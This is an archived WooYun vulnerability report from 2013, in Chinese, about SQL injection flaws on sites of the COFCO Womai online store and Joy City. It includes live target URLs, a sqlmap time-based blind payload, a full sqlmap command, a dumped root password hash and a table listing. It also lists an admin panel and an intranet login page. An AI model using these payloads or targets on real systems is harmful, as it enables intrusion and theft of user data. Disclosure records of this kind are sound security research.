当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036147

漏洞标题:中粮我买网多处SQLinject漏洞

相关厂商:中粮我买网

漏洞作者: zzR

提交时间:2013-09-05 10:39

修复时间:2013-10-20 10:40

公开时间:2013-10-20 10:40

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-05: 细节已通知厂商并且等待厂商处理中
2013-09-05: 厂商已经确认,细节仅向厂商公开
2013-09-15: 细节向核心白帽子及相关领域专家公开
2013-09-25: 细节向普通白帽子公开
2013-10-05: 细节向实习白帽子公开
2013-10-20: 细节向公众公开

简要描述:

中粮我买网多处SQLinj

详细说明:

1#

http://jifen.womai.com/share.php?activity=6&code=13055364&mid=0


未修复完善code参数存在延时盲注,比较蛋疼

sqlmap identified the following injection points with a total of 365 HTTP(s) requests:
---
Place: GET
Parameter: code
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: activity=6&code=13055364' AND SLEEP(5) AND 'iNCN'='iNCN&mid=0
---
back-end DBMS: MySQL 5.0.11
current user:    'womai_xiangzi@localhost'
current database:    'womai_xiangzi'


jifen.jpg

漏洞证明:

2#旗下大悦城多处dba注射

sqlmap.py -u "http://www.cyjoycity.com/pinpai_detail.php?id=15" --current-db --current-user --dbms mysql
http://www.cyjoycity.com/info.php?id=369
http://www.cyjoycity.com/joy.php?id=17
http://www.cyjoycity.com/eat.php?id=263
http://www.cyjoycity.com/pinpai_detail.php?id=15


web server operating system: Windows
web application technology: PHP 5.2.5, Apache 2.2.6
back-end DBMS: MySQL >= 5.0.0
current user:    'dycManage@localhost'
current database:    'dyc'
database management system users password hashes:
[*] dycManage [1]:
    password hash: NULL
[*] root [1]:
    password hash: 5aa679333c30a3a2


root hash

hash.jpg


Database: dyc
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| emails           | 5216    |
| dyc_map          | 288     |
| brand            | 196     |
| dyc_info         | 151     |
| brand_cate       | 35      |
| forum_post       | 23      |
| forum_thread     | 18      |
| map_category     | 18      |
| project          | 13      |
| forum_users      | 12      |
| dyc_shop         | 6       |
| dyc_shop_cate    | 6       |
| kv_config        | 6       |
| forum_group      | 5       |
| forum_category   | 3       |
| dyc_basic        | 1       |
| dyc_user         | 1       |
| forum_config     | 1       |
| forum_user_group | 1       |
+------------------+---------+


本来试试osshell的。在http://www.cyjoycity.com/xml/member_info.php 找到绝对路径 D:\joycity ,但是写的时候发现写不进去,唉
各种各样的列目录就不说了

http://www.cyjoycity.com/admin1/


另外发现一处内网Lan入口,http://lan.cyjoycity.com/ 大悦城内网入口 大悦城邮件中粮邮件入口 报表系统

.jpg


很方便进内网啥的是么?

修复方案:

版权声明:转载请注明来源 zzR@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-09-05 21:30

厂商回复:

这个有重复,感谢洞主~~

最新状态:

暂无